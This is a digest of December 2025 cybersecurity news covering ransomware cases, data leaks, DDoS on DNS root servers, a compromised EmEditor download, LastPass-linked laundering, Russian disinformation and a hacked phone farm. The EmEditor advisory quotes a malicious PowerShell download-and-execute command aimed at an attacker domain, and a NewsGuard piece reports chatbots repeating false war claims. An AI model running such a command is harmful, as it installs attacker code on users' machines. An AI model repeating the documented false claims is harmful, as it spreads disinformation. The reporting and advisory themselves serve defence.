Update of December 27, 2025: By now, the data leak has started to be picked up on LinkedIn by Alon Gal and on Have I Been Pwned by Troy Hunt. Condé Nast has yet to issue any public statement or respond to this site’s inquiries. As HIBP reports:
In December 2025, 2.3M records of WIRED magazine users allegedly obtained from parent company Condé Nast were published online. The most recent data dated back to the previous September and exposed email addresses and display names, as well as, for a small number of users, their name, phone number, date of birth, gender, and geographic location or full physical address. The WIRED data allegedly represents a subset of Condé Nast brands the hacker also claims to have obtained.
bleepingcomputer.com
By Sergiu Gatlan
December 30, 2025
Two former employees of cybersecurity incident response companies Sygnia and DigitalMint have pleaded guilty to targeting U.S. companies in BlackCat (ALPHV) ransomware attacks in 2023.
Two former employees of cybersecurity incident response companies Sygnia and DigitalMint have pleaded guilty to targeting U.S. companies in BlackCat (ALPHV) ransomware attacks in 2023.
33-year-old Ryan Clifford Goldberg of Watkinsville, Georgia (in federal custody since September 2023), and 28-year-old Kevin Tyler Martin of Roanoke, Texas, who were charged in November, have now pleaded guilty to conspiracy to obstruct commerce by extortion and are set to be sentenced on March 12, 2026, facing up to 20 years in prison each.
Together with a third accomplice, the two BlackCat ransomware affiliates breached the networks of multiple victims across the United States between May 2023 and November 2023, paying a 20% share of ransoms in exchange for access to BlackCat's ransomware and extortion platform.
Goldberg is a former Sygnia incident response manager, and Martin worked at DigitalMint as a ransomware threat negotiator (just as the unnamed co-conspirator).
"These defendants used their sophisticated cybersecurity training and experience to commit ransomware attacks — the very type of crime that they should have been working to stop," said Assistant Attorney General A. Tysen Duva. "Extortion via the internet victimizes innocent citizens every bit as much as taking money directly out of their pockets."
According to court documents, their alleged victims include a Maryland pharmaceutical company, a California engineering firm, a Tampa medical device manufacturer, a Virginia drone manufacturer, and a California doctor's office.
While they have demanded ransoms ranging from $300,000 to $10 million, prosecutors said they were only paid $1.27 million by the Tampa medical device company after encrypting its servers and demanding $10 million in May 2023. While other victims also received ransom demands, the indictment does not indicate whether additional payments were made.
As BleepingComputer previously reported, the Justice Department was also investigating a former DigitalMint negotiator in July for allegedly working with ransomware groups. However, the DOJ and FBI did not comment on the investigation, and it is unclear if this case is related to it.
In December 2023, the FBI created a decryption tool after breaching BlackCat's servers to monitor their activities and obtain decryption keys. The FBI also found that the BlackCat operation collected at least $300 million in ransom payments from more than 1,000 victims until September 2023.
In a February 2024 joint advisory, the FBI, CISA, and the Department of Health and Human Services (HHS) also warned that Blackcat affiliates were primarily targeting organizations in the U.S. healthcare sector.
Hackread – Cybersecurity News, Data Breaches, AI, and More
by
Waqas
December 26, 2025
2 minute read
On December 25, while much of the world was observing Christmas, the Everest ransomware group published a new post on its dark web leak site claiming it had breached Chrysler systems, an American automaker. The group says it exfiltrated 1088 GB (over 1 TB) of data, describing it as a full database linked to Chrysler operations.
According to the threat actors, the stolen data spans from 2021 through 2025 and includes more than 105 GB of Salesforce related information. Everest claims the data contains extensive personal and operational records tied to customers, dealers, and internal agents.
Everest Ransomware Group Claims Theft of Over 1TB of Chrysler Data
Screenshot from the Everest ransomware group’s dark web leak site (Credit: Hackread.com)
Leaked Screenshots and Sample Data Details
Screenshots shared by the group and reviewed for this report appear to show structured databases, internal spreadsheets, directory trees, and CRM exports. Several images display Salesforce records containing customer interaction logs with names, phone numbers, email addresses, physical addresses, vehicle details, recall case notes, and call outcomes such as voicemail, disconnected, wrong number, or callback scheduled.
Everest Ransomware Group Claims Theft of Over 1TB of Chrysler Data
Related screenshots (Credit: Hackread.com)
The same material also includes agent work logs documenting call attempts, recall coordination steps, appointment handling, and vehicle status updates, such as sold, repaired, or owner not found.
Additional screenshots appear to reference internal file servers and directories labelled with dealer networks, automotive brands, recall programs, FTP paths, and internal tooling. One set of images also suggests the presence of HR or identity-related records, listing employee names, employment status fields such as active or permanently separated, timestamps, and corporate email domains associated with Stellantis.
For your information, Stellantis is a global automaker behind brands such as Jeep, Chrysler, Dodge, and FIAT. The automaker was also a victim of a cyber attack in September 2025.
Samples published by the attackers also include recall case narratives documenting customer conversations, interpreter use, dealership coordination, appointment scheduling, and follow-up actions. These records align with standard automotive recall support and customer service processes and are consistent with the CRM data shown in other samples.
The group has threatened to publish the full dataset once its countdown timer expires, stating that the company still has time to make contact. Everest also announced plans to release audio recordings linked to customer service interactions, further escalating the pressure.
Unconfirmed Pending Chrysler Response
Ransomware groups increasingly time disclosures around holidays, when incident response capacity is often reduced. At the time of writing, Chrysler has not publicly confirmed the breach or commented on the claims, and independent verification remains limited.
If validated, the alleged exposure would raise significant concerns regarding customer privacy, internal operational security, and third-party platform governance, given the reported scale and sensitivity of the CRM and recall management data involved.
This story is developing.
| NETSCOUT netscout.com
by
John Kristoff, Max Resing
on
December 17th, 2025
Executive SummaryThe internet is a system of systems. There is no central organizing committee that governs how it is constructed and operated.
Executive Summary
The internet is a system of systems. There is no central organizing committee that governs how it is constructed and operated. There are norms and best practices, as well as agreed-upon standards of operation such as what an Internet Protocol (IP) datagram looks like and how it should be interpreted, but even the behaviors of creating and interpreting IP packets can sometimes vary. For these reasons, to identify the core of the internet, and enforce lasting and comprehensive control over it, is not easy. However, there are a handful of internet subsystems people often name as being critical to the proper and safe functioning of the internet. One such subsystem is the Domain Name System (DNS) root servers. Internet disruptions can take many forms, but if the root DNS system were to become unavailable, it would be practically indiscernible from a complete and total internet outage. In practice, the system’s resiliency and caching behavior of resolvers significantly blunts the likelihood of a complete system failure. Nevertheless, the performance and accuracy of this subsystem is of utmost importance.
The root DNS system has come under attack many times throughout history, and in some cases, we have seen some partial disruption. Overall, however, the DNS root server system has remained robust and widely available. Replication and redundancy of root system component parts, along with high levels of operational care, have largely led to the success of the root server system. However, the root system is always under pressure from high-rate packet floods, route hijacking, and physical sabotage. This blog examines some of these pressures from the perspective of distributed denial-of-service (DDoS) attack traffic to which the root server system is subject.
Key Findings
Background
Most internet client communications start with a DNS query. An application maps an abstract but human-readable name into something about that name such as an IP address. This process is colloquially called the DNS resolution process, and the DNS root servers literally and figuratively stand at the apex of this hierarchical system. They are the entry point into a distributed database that makes mapping names to IP addresses possible. Technically, the internet could operate without DNS, but in practice it has become an important part of the communications process. It is safe to say that the DNS is one of the most important—if not the most important—subsystem of them all. The performance and availability of this system therefore is paramount.
DNS servers come under attack all the time, some more than others. An attack involving the DNS is typically one of two types. The first major type’s purpose is to compromise the integrity of DNS data. This might be performed by altering the source of DNS data itself—by compromising a server and changing zone files, for example. Alternatively, an attacker may try to manipulate a resolution in flight. DNS cache poison attacks are a common vector of attack against the resolution process, for instance.
The second type of attack attempts to disrupt the DNS resolution process by taking an authoritative DNS server in the name space hierarchy out of service. This is a classic denial-of-service attack. The nearer the apex of the name space or for highly impactful zones, a disruption can have far-reaching effects. If the root servers were to be disrupted, for example, this would ultimately cause problems for practically everyone and everything that uses the DNS.
Fortunately, the DNS root server system has rarely been the target of successful integrity or disruption attacks. That is not to say the DNS root system has not been attacked; this Wikipedia page lists a few high-profile attacks DNS root servers have been subject to.
The root server system is extremely well provisioned and operated. There are 12 root server operators and hundreds of root servers located all over the world. Primarily through the use of BGP anycast, the modern root server system is extraordinarily resilient to denial-of-service packet flooding attacks. However, attack attempts still seem to appear from time to time. In the remainder of this article, we examine some of the attacks the root system is subject to, and with the help of third-party data show how well the system has withstood these onslaughts.
Motivations for DDoS Attacks on DNS Root Servers
The root servers have been subject to a variety of threats, with some degree of success. Due to the extensive redundancy and capacity of the current system, however, disrupting the system with packet flooding?–style attacks is not easy. Furthermore, most modern attacks aim to disrupt a specific subset of service on the internet, not the entire internet itself. Although some attackers may seek to cause general mischief or to exert a show of strength, a degraded root server system would just make everything worse for everyone. This is rarely the objective of today’s internet miscreants. In addition, internet defenders everywhere leap into action the larger and more widespread attacks become. An attack against the root system is not just an attack against the 12 root operators and their systems, but against the entire internet, much of which will respond to thwart attempts to disrupt the system.
So, although attacks on the DNS root occur, most of them are rarely noticed by the public or do not have a significant impact. Nonetheless, we do observe elevated rates of traffic toward the root—traffic that might even overwhelm many other organizations and networks. Attacks against the root may be trying to learn incident response time and defenses. They might also be observing the effect attacks have on public monitoring graphs of performance or response latency—if not for the root specifically, perhaps even local and in-transit networks. The root system, being so central to the internet, is exposed to a lot of suspicious and malicious traffic. Much of this otherwise-unwanted traffic may be simply noise, but whatever the reasons, it is often helpful to study what the root sees, because it just may be a harbinger of what any target on the internet might be up against. What can we learn from analyzing attacks on the root? We explore this question in the next section.
Analysis
NETSCOUT’s ATLAS visibility platform provides a tremendous amount of telemetry for DDoS attack events. Figure 1 presents a chronological overview of DDoS events aimed at the root servers. The strongest volumetric attack present in the ATLAS dataset shows an attack on the A root server with 21Gb/s of traffic on August 17, 2025.
Figure 1: Chronological overview of DDoS attack events on DNS root servers as visible in ATLAS threat intelligence datasets. Illustrated are a total of 38 data points. (The dataset observes no attacks on g.root-servers.net.)
Figure 1: Chronological overview of DDoS attack events on DNS root servers as visible in ATLAS threat intelligence datasets. Illustrated are a total of 38 data points. (The dataset observes no attacks on g.root-servers.net.)
ASERT observes a different set of DDoS attack vectors to different root servers. The A root and the M root face numerous DDoS attack vectors. In contrast, D and H–L root servers are only observed to have seen the combinations of total traffic and Internet Control Message Protocol (ICMP) attacks. Often, the ICMP observations are sympathetic to a DDoS attack, meaning that attackers and/or defenders probe systems to gain insights. In theory, each instance (A through M) of the root should be a mirror of the others.
Why might some root server instances be subject to vastly different amounts of traffic? A variety of reasons could explain this discrepancy. For example, some instances may be preferred by resolvers due to historical accident, topological connectivity, or resolver selection strategy. An interesting speculation of why the A root receives more attacks is because it is the first letter of the alphabet—a dull but probable reason. Root operators deploy different numbers of anycast instances, and those instances are distributed unevenly around the world. Because BGP anycast directs queries to the topologically closest anycast instance, some root instances may naturally attract more traffic, including more noise and invalid queries (see Figure 2).
Figure 2: This percentage overview presents the DDoS attack events observed and reveals how some root servers receive a wider array of DDoS attack vectors.
Figure 2: This percentage overview presents the DDoS attack events observed and reveals how some root servers receive a wider array of DDoS attack vectors.
Discussion
The numerous instances of root servers make it particularly cumbersome to construct a full picture of traffic that reaches the root servers. Although anycast impacts the visibility of external institutions into operational aspects of root server instances, it enhances the resiliency of a DNS root server formidably—a much-desired characteristic for such a critical building block of the internet. The distribution of traffic to different instances provides the advantage of spreading queries out but also isolating sources of DDoS attack traffic to local instances.
Studies over the years have measured significant amounts of query traffic to root servers that are illegitimate. [Wessel, ISOC]. Despite the massive overrepresentation of noise to useful query traffic, the steady state of DNS root traffic volumes remains relatively modest compared with other types of services, usually measured in the tens of megabits per second. This is due to the nature of DNS query traffic itself: small, short-lived request/response packets. Long-lived, large data flows don’t occur in the DNS. Furthermore, although the use of DNS over Transmission Control Protocol (TCP) is slightly increasing, TCP-based attacks are still relatively rare and infrequent in the DNS.
What lessons can we learn from the resiliency of the DNS root server system? Simplicity, instance placement distribution, operational diversity, the use of anycast, and of course expert technical operators overseeing it all. These attributes may not be easily replicated in other parts of the internet, but perhaps we can leverage some of what works where it can work in other systems?
Recommendations
Defenders can take lessons from DNS root server operations. In some cases, their techniques are engineering choices, not commercial purchasing decisions. For example, can anycast be used to help make the attack surface wider and less reliant on single points of failure? To detect and mitigate abusive, ever-changing networks of varying size and duration, we recommend the following:
Real-time visibility into volumetric traffic floods and distributed attack patterns. Tools such as NETSCOUT Arbor Sightline can help surface early signs of trouble and trigger flow-specification and remotely triggered black hole (RTBH) defenses to upstream providers.
Proactive mitigation with automated systems such as Arbor Threat Mitigation System (TMS) or Arbor Edge Defense (AED). These can stop both volumetric floods and more-complex, multivector attacks.
Intelligence-driven defense with feeds such as NETSCOUT’s ATLAS Intelligence Feed (AIF). These provide information about context, what’s trending, who’s being targeted, and how actors are evolving.
Staying ahead of threat actors is an ever-changing job and requires a broad view of where these attacks come from, how they operate, and where they could strike next.
EmEditor (Text Editor) emeditor.com
December 22, 2025/in General/by Yutaka Emura
We regret to inform you that we have identified an incident involving the EmEditor official website’s download path (the [Download Now] button), where unauthorized modification by a third party is suspected. During the affected period, the installer downloaded via that button may not have been the legitimate file provided by us (Emurasoft, Inc.).
We sincerely apologize for the concern and inconvenience this may cause. Please review the information below.
Potentially Affected Period
Dec 19, 2025 18:39 – Dec 22, 2025 12:50 (U.S. Pacific Time)
If you downloaded the installer from the [Download Now] button on the EmEditor homepage during this period, it is possible that a different file without our digital signature was downloaded. This is a conservative estimate, and in reality the affected period may have been narrower and limited to a specific timeframe.
Incident Summary (High-Level Cause)
The [Download Now] button normally points to the following URL:
https://support.emeditor.com/en/downloads/latest/installer/64
This URL uses a redirect. However, during the affected period, the redirect settings appear to have been altered by a third party, resulting in downloads being served from the following (incorrect) URL:
https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi
This file was not created by Emurasoft, Inc., and it has already been removed.
As a result, we have confirmed that the downloaded file may be digitally signed not by us, but by another organization named WALSHAM INVESTMENTS LIMITED.
Note: This issue may not be limited to the English page and may affect similar URLs for other languages as well (including Japanese).
emed64_25.4.3.msi
Legitimate file (official)
File name: emed64_25.4.3.msi
Size: 80,376,832 bytes
Digital signature: Emurasoft, Inc.
SHA-256: e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
Suspicious file (possible tampering)
File name: emed64_25.4.3.msi
Size: 80,380,416 bytes
Digital signature: WALSHAM INVESTMENTS LIMITED
You updated via EmEditor’s Update Checker or through EmEditor’s automatic update
You downloaded directly from download.emeditor.info
Example: https://download.emeditor.info/emed64_25.4.3.msi
You downloaded a file other than emed64_25.4.3.msi
You used the portable version
You used the store app version
You installed/updated using winget
You downloaded the file but did not run/execute it
5-1. How to check the Digital Signature (Windows)
Right-click the file (emed64_25.4.3.msi) and select Properties.
Open the Digital Signatures tab.
Confirm that the signer is Emurasoft, Inc.
If it shows WALSHAM INVESTMENTS LIMITED, the file may be malicious.
If the “Digital Signatures” tab is not shown, the file may be unsigned or the signature may not be recognized. In that case, do not run the file; delete it and follow the guidance below.
5-2. How to check SHA-256 (Windows / PowerShell)
Open PowerShell and run:
Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256
Confirm the output SHA-256 matches:
Legitimate SHA-256:
e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
If the signature or SHA-256 does not match (Recommended actions)
If the digital signature is not Emurasoft, Inc. (e.g., it is WALSHAM INVESTMENTS LIMITED) or the SHA-256 does not match, you may have obtained a tampered file (potentially containing malware).
Immediately disconnect the affected computer from the network (wired/wireless)
Run a full malware scan on the system
Depending on the situation, consider refreshing/rebuilding the environment including the OS
Consider the possibility of credential exposure and change passwords used/stored on that device (and enable MFA where possible)
If you are using EmEditor in an organization, we also recommend contacting your internal security team (e.g., CSIRT) and preserving relevant logs where possible.
powershell.exe "irm emeditorjp.com | iex"
This command downloads and executes content from emeditorjp.com.
emeditorjp.com is not a domain managed by Emurasoft, Inc.
Please also note that the installer may still proceed to install EmEditor normally and install legitimate EmEditor program files, which could make the issue difficult to notice.
We sincerely apologize again for the inconvenience and concern this may have caused, and we appreciate your understanding and continued support of EmEditor.
trmlabs.com Team | TRM Blog
TRM traced LastPass-linked Bitcoin laundering through mixers to high-risk Russian exchanges, showing how demixing exposes infrastructure reuse and limits mixer anonymity.
Key takeaways
In 2022, hackers breached LastPass, one of the world’s most widely used password managers, exposing backups of roughly 30 million customer vaults — encrypted containers holding users’ most sensitive digital credentials, including crypto private keys and seed phrases. * Although the vaults were encrypted and initially unreadable without each user’s master passwords, attackers were able to download them in bulk. That created a long-tail risk for more than 25 million users globally: any vault protected by a weak master password could eventually be decrypted offline, turning a single 2022 intrusion into a multi-year window for attackers to quietly crack passwords and drain assets over time.
New waves of wallet drains have surfaced throughout 2024 and 2025, extending the breach’s impact far beyond its initial disclosure. By analyzing a recent cluster of these drains, TRM analysts were able to trace the stolen funds through mixers and ultimately to two high-risk Russian exchanges frequently used by cybercriminals as fiat off-ramps — with one of them receiving LastPass-linked funds as recently as October.
These findings offer a clear on-chain view of how the stolen assets are being moved and monetized, helping illuminate the pathways and infrastructure supporting one of the most consequential credential breaches of the last decade. Based on the totality of on-chain evidence — including repeated interaction with Russia-associated infrastructure, continuity of control across pre-and post-mix activity, and the consistent use of high-risk Russian exchanges as off-ramps — TRM assesses that the activity is consistent with involvement by Russian cybercriminal actors.
Analysis of these thefts reveals two consistent indicators that point toward possible Russian cybercrime involvement.
First, stolen funds were repeatedly laundered through infrastructure commonly associated with Russian cybercriminal ecosystems, including off-ramps historically used by Russia-based threat actors.
Second, intelligence linked to the wallets interacting with mixers both before and after the mixing and laundering process indicated operational ties to Russia, suggesting continuity of control rather than downstream reuse by unrelated actors.
While definitive attribution of the original intrusion cannot yet be confirmed, these signals, combined with TRM’s ability to demix activity at scale, highlight both the central role of Russian cybercrime infrastructure in monetizing large-scale hacks and the diminishing effectiveness of mixing as a reliable means of obfuscation.
What demixing revealed
TRM identified a consistent on-chain signature across the thefts: stolen Bitcoin keys were imported into the same wallet software, producing shared transaction traits such as SegWit usage and Replace-by-Fee. Non-Bitcoin assets were quickly converted into Bitcoin via instant swap services, after which funds were transferred into single-use addresses and deposited into Wasabi Wallet. Using this pattern, TRM estimates that more than USD 28 million in cryptocurrency was stolen, converted to Bitcoin, and laundered through Wasabi in late 2024 and early 2025.
Rather than attempting to demix individual thefts in isolation, TRM analysts analyzed the activity as a coordinated campaign, identifying clusters of Wasabi deposits and withdrawals over time. Using proprietary demixing techniques, analysts matched the hackers’ deposits to a specific withdrawal cluster whose aggregate value and timing closely aligned with the inflows, an alignment statistically unlikely to be coincidental.
Blockchain fingerprints observed prior to mixing, combined with intelligence associated with wallets after the mixing process, consistently pointed to Russia-based operational control. The continuity across pre-mix and post-mix stages strengthens confidence that the laundering activity was conducted by actors operating within, or closely tied to, the Russian cybercrime ecosystem.
Early Wasabi withdrawals occurred within days of the initial wallet drains, suggesting that the attackers themselves were responsible for the initial CoinJoin activity. Taken together, these findings demonstrate both the diminishing reliability of mixing as an obfuscation technique and the central role of demixing in revealing the structure and geography of large-scale illicit campaigns.
Russian off-ramps as a reinforcing signal
Analysis of LastPass-linked laundering activity reveals two distinct phases that both converged on Russian exchanges. In an earlier phase following the initial exploitation, stolen funds were routed through the now defunct Cryptomixer.io and off-ramped via Cryptex, a Russia-based exchange sanctioned by OFAC in 2024. In a subsequent wave identified in September 2025, TRM analysts traced approximately USD 7 million in additional stolen funds through Wasabi Wallet, with withdrawals ultimately flowing to Audi6, another Russian exchange associated with cybercriminal activity.
Applying the same demixing methodology across both periods, TRM identified consistent laundering patterns, including clustered withdrawals and peeling chains that funneled mixed Bitcoin into these exchanges. The repeated use of Russian exchanges at the off-ramp stage, combined with intelligence indicating Russia-based operational control both before and after mixing, suggests continuity in the laundering infrastructure rather than isolated or opportunistic usage. Together, these findings point to alignment with a persistent Russian cybercriminal ecosystem across multiple phases of the LastPass-related activity.
Why the Russian connection matters
The significance of likely Russian involvement extends beyond this single case. Russian high-risk exchanges and laundering services have repeatedly served as critical off-ramps for globally dispersed ransomware groups, sanctions evaders, and other cybercriminal networks. Their role in the LastPass laundering pipeline underscores how Russia-based financial infrastructure continues to function as a systemic enabler of global cybercrime, even as enforcement pressure increases elsewhere.
This case also highlights how mixers do not eliminate attribution risk when threat actors rely on consistent infrastructure and geographic ecosystems over time. Demixing allowed TRM to move beyond individual transactions and reveal the broader operational architecture, including where illicit value ultimately converges.
Frequently asked questions (FAQs)
What happened in the LastPass breach?
In 2022, a threat actor gained access to encrypted vault data stored by LastPass. As users failed to rotate passwords or improve vault security, attackers continued to crack weak master passwords years later — leading to wallet drains as recently as late 2025.
Why is Russian involvement suspected?
TRM observed two consistent signals:
Pre and post-mix wallet intelligence pointed to the same operator using Russian infrastructure.
Off-ramps included multiple Russia-based exchanges, including one previously sanctioned for facilitating ransomware laundering.
Behavioral patterns (e.g. wallet software traits, transaction formatting)
Timing and amounts
Destination addresses with known ties to illicit ecosystems
This enabled linkage across waves of theft and over time — exposing centralized laundering control.
USD 28 million demixed from 2024–early 2025 flows
USD 7 million from a September 2025 wave linked to additional Wasabi usage
Why is this still happening three years later?
Many affected LastPass users failed to change or secure master passwords, and their vaults still contained private keys. As threat actors brute-force vaults over time, slow-drip wallet draining has become a recurring pattern.
What makes this case important?
This is a clear example of how:
Mixers don't provide true anonymity when infrastructure is reused
Off-ramp infrastructure remains the best attribution signal
Illicit networks adapt, but don’t disappear — when one service is sanctioned, another emerges
newsguardrealitycheck.com
By Eva Maitland and Alice Lee
400 and Counting: A Russian Influence Operation Overtakes Official State Media in Spreading Russia-Ukraine False Claims
As Ukraine faces battlefield struggles, an ongoing corruption probe, and pressure from the U.S., the Storm-1516 Russian disinformation operation is becoming more prolific and harmful, an analysis of NewsGuard’s database of more than 400 false claims about the war shows.
newsguardrealitycheck.com
By Eva Maitland and Alice Lee
NewsGuard has now debunked 400 false claims about the Russia-Ukraine war pushed by Russia, and an analysis of our database shows that in 2025, Russian influence operations surpassed official state media as the biggest source of these narratives.
One operation in particular, dubbed by Microsoft as Storm-1516, has emerged as the most prolific and rapidly expanding of the various operations, NewsGuard found. The campaign is known for generating and spreading false claims accusing Ukraine and its allies of corruption and other illegal acts, employing AI-enabled websites, deepfake videos, and inauthentic X accounts. False claims by the campaign often reach millions of views on social media.
RT and Sputnik, the Kremlin’s primary state-funded outlets aimed at a global audience, have long been at the heart of Russia’s propaganda efforts. However, NewsGuard found that in 2025, RT and Sputnik together spread just 15 false claims about the war — compared to 24 created and spread by Storm-1516 alone. NewsGuard sent emails to RT and Sputnik seeking comment on state media’s influence compared to Storm-1516 but did not receive a response.
Russia’s other major foreign influence operations include Matryoshka, a campaign known for mass-creating fake news reports appropriating the branding of credible news outlets, and the Foundation to Battle Injustice, a self-styled human rights organization that publishes “investigations” accusing Ukraine and its allies of human rights abuses. False claims by these campaigns are typically amplified by the Kremlin’s vast disinformation ecosystem, which includes the Pravda network, which encompasses 280 sites identified by NewsGuard that republish Russian propaganda in large volume in dozens of languages.
Nearly four years into the war in Ukraine, NewsGuard has debunked 44 false claims about the war emanating from Storm-1516, compared to 25 false claims from Matryoshka and six by the Foundation to Battle Injustice. These figures are derived from NewsGuard’s proprietary database of False Claims Fingerprints, a continuously updated datastream of provably false claims and their debunks.
Moreover, Storm-1516 has been steadily increasing its output since its inception in 2023. NewsGuard found that six of its false claims emerged from August 2023 to January 2024, 14 from February 2024 to January 2025, and 24 from February 2025 to mid-December 2025, making the campaign the fastest-growing source of false claims about the war monitored by NewsGuard.
Storm-1516 overtook the combination of RT and Sputnik in 2025 as purveyors of false information, according to NewsGuard’s database.
The rise of Storm-1516 as a source of false information about the war suggests that the Kremlin is increasingly relying on covert influence operations — rather than its state-owned media, which are sanctioned and banned in Europe and the U.S. — to spread false claims. Operations like Storm-1516, which are not officially state-owned media, are not typically subject to sanctions, although companies and individuals associated with them sometimes are. (More on this below.)
Moscow is set to spend $1.77 billion on state media in 2026, with $388 million reserved for RT, marking “a new all-time high,” the independent news agency the Moscow Times reported. Sputnik’s budget is unclear, and the amount spent by the Kremlin on its covert operations is also unknown.
FAKES PUSHING FAKES, THANKS TO AI
Thanks to AI tools, the influence campaigns outside of state media appear to be able to produce and propagate false claims at far greater speed and volume, and reach more viewers. Storm-1516 published five false claims about Ukraine in November 2025 alone, which spread in 11,900 articles and posts on X and Telegram, generating 43 million views.
AI appears to be a key factor enabling Storm-1516 to increase its productivity and effectiveness. When the campaign began in late 2023, it initially posted videos to YouTube of real people posing as whistleblowers denouncing corruption by Zelensky. By early 2024, it had begun using AI-generated personas in its “whistleblower” videos and planting its false claims on a network of hundreds of AI-enabled news sites. With names like BostonTimes.org, SanFranChron.com, and LondonCrier.com, the sites came complete with AI-generated logos and used AI to rewrite and automatically publish content from other news outlets.
THE HAND OF DOUGAN
Storm-1516 includes the efforts of John Mark Dougan, the former U.S. Marine and Florida deputy sheriff who fled to Russia in 2016 after his home was raided by the FBI for allegedly leaking confidential information about local officials. In 2018, Palm Beach County prosecutors charged Dougan with wiretapping and extortion, officially making him a fugitive on the run.
In conversations with NewsGuard, Dougan has consistently denied having any links to the Russian government. For example, when NewsGuard asked Dougan in October about his involvement with 139 French-language websites making false claims about President Macron, Dougan told us on Signal, “I’ve never heard of those sites. Still, I have no doubt [about] the accuracy and quality of the news they report.”
In October 2024, The Washington Post reported that Dougan was provided funding by the GRU, Russia’s military intelligence service, and directed by Valery Korovin, director of the Russian think tank Center for Geopolitical Expertise. The Post reported that the GRU paid Dougan to create and manage an AI server in Russia.
In December 2025, the European Union added Dougan to a new sanctions list, making him the first American to be sanctioned for allegedly running influence operations with the goal of “influenc[ing] elections, discredit[ing] political figures and manipulat[ing] public discourse in Western countries.” Eleven other individuals were also sanctioned for online influence operations. Asked over messaging app Signal about his role in Storm-1516 and how the campaign was able to increase its output in 2025, Dougan said in a Dec. 23, 2025, message, “Storm 1516? Never heard of them. Sorry.”
CAPITALIZING ON CORRUPTION
False claims generated or pushed by Storm-1516 often accuse Ukrainian President Volodymyr Zelensky and other Ukrainian officials of using Western aid money to make lavish purchases of properties, cars, and other luxury items. More than the other Russian operations, NewsGuard found that Storm-1516 has ramped up its operations in recent months, apparently seeking to capitalize on negative press linked to an ongoing corruption scandal in Ukraine and growing pressure from the Trump administration for Ukraine to make concessions to Russia.
When Ukraine’s National Anti-Corruption Bureau (NABU) announced in mid-November that it was investigating a $100 million embezzlement scheme in Ukraine’s energy sector, Storm-1516 jumped at the opportunity to spread false claims implicating Zelensky in the scandal. (Zelensky has not been indicted or directly implicated in accusations of corruption.)
For example, on Dec. 10, 2025, X accounts associated with Storm-1516 published a video modelled on the style of videos from NABU and the Specialized Anti-Corruption Prosecutor’s Office (SAP) — even displaying the agencies’ logos at the start of the video — claiming that anti-corruption investigators found $14 million in cash, records of $2.6 billion in offshore bank transfers, and a number of foreign passports for Zelensky during a search of the office of Andriy Yermak, Ukrainian President Volodymyr Zelensky’s former chief of staff.
A December 2025 Storm-1516 campaign made false claims, capitalizing on an ongoing corruption probe. (Screenshots via NewsGuard)
“NABU discovered a collection of foreign passports during a court authorized search of presidential chief of staff Andriy Yermak’s office in Kyiv,” the video stated, displaying images of apparent Israeli and Bahamian passports featuring Zelensky’s face and information.
The NABU/SAP video is a fabrication, and does not appear on any of NABU’s or SAP’s official social media channels or websites. There is no evidence that Zelensky or Yermak have passports of other countries.
Nevertheless, the claim spread in 4,300 posts on X and Telegram, gaining more than 4 million views. For example, a Dec. 11, 2025, X post of the video by @aleksbrz11, a pro-Kremlin account with a profile picture showing a fighter for the former Russian mercenary Wagner group, gained 1.8 million views and 1,800 reposts in one day.
IMPERSONATING CREDIBLE NEWS OUTLETS
In April 2025, the campaign began impersonating credible news outlets, publishing a video with the logo of London-based The Sun claiming that Ukrainian first lady Olena Zelenska purchased a dress previously belonging to Princess Diana, for $2.9 million. Since then, it has created websites and videos imitating outlets including Ukrainian news site the Kyiv Independent, Saudi news site Al Arabiya, and investigative news outlet Bellingcat. NewsGuard has found this campaign has impersonated nine credible news outlets to spread false claims, including Ukrainian site The Kyiv Independent, investigative journalism Bellingcat, and French public TV broadcaster France Télévisions.
In November 2025, Storm-1516 created the website PageSix.now, a site resembling PageSix.com, an offshoot of the gossip section of the New York Post, to plant a false story that Zelensky bought a $29 million New York townhouse belonging to former actor and comedian Bill Cosby. The claim gained 5,087 posts and 19.8 million views.
Storm-1516 created a website imitating PageSix.com, the site of the gossip section of the New York Post. (Screenshot via NewsGuard)
While often using AI tools to advance its false narratives, Storm-1516 efforts have an afterlife due to their propensity to infect top AI models, creating another way for the claims to infiltrate the global media ecosystem.
NewsGuard’s regular audits of the leading AI chatbots have repeatedly found that they are vulnerable to repeating false claims originating with Storm-1516. For example, in a March 2025 audit, NewsGuard prompted the chatbots with the false claim that Ukrainian fighters were filmed burning an effigy of Donald Trump, which was based on a staged video produced by Storm-1516.
Asked, “Did fighters of the Azov battalion burn an effigy of Trump?” Four of the chatbots repeated the claim as fact, citing articles from the Pravda network.
The office of the President of Ukraine, the Ukrainian National Security and Defense Council, and the Ukrainian Center for Countering Disinformation did not respond to NewsGuard’s requests for an interview.
Edited by Dina Contini and Eric Effron
Editor’s Note: This story was updated on Dec. 23, 2025, to add a comment from John Mark Dougan.
futurism.com
Joe Wilkins
Correspondent
A hacker found a way into the backend of AI startup Doublespeed, which offers customers access to a massive phone farm network.
Back in October, word started making the rounds of an AI startup called Doublespeed. Backed by venture capital firm Andreessen Horowitz, Doublespeed offers customers a unique service: access to a massive phone farm that could be used to operate hundreds of AI-generated social media accounts.
Now, 404 Media reports in an explosive scoop that Doublespeed has been hacked. This wasn’t just one account associated with the startup, but the entire backend used to manage its phone farm — so it provides an extraordinary glimpse at how the service is actually being used to manipulate social media at scale.
Speaking to 404 on condition of anonymity, the hacker said they can “see the phones in use, which manager [computers controlling the phones] they had, which TikTok accounts they were assigned, proxies in use (and their passwords), and pending tasks. As well as the link to control devices for each manager.”
The hacker also shared a list of over 400 TikTok accounts operated by Doublespeed’s phone farm, about half of which were actively promoting products. Most of them, the publication reports, did so without disclosing that the posts were ads — a direct violation of TikTok’s terms of use, not to mention the Federal Trade Commission’s digital advertising regulations.
While undisclosed ads might seem like small potatoes in the grand scheme of things, the speak to a bleak trend. Not only is Doublespeed a possible breeding ground for disinformation campaigns or financial scams, but they seem to be getting away with their phone farm operation without any pushback from TikTok.
Doublespeed’s TikTok accounts ran a gamut of different cons, promoting language learning apps, supplements, massage products, dating apps and more. One account, operating under the unambiguously human-sounding name of Chloe Davis, had uploaded some 200 posts featuring an AI-generated woman hawking a massage roller for a company called Vibit, 404 reported.
Though the hacker says he reported the vulnerability to Doublespeed on October 31, he notes that he still had access to the company’s back end as recently as today.
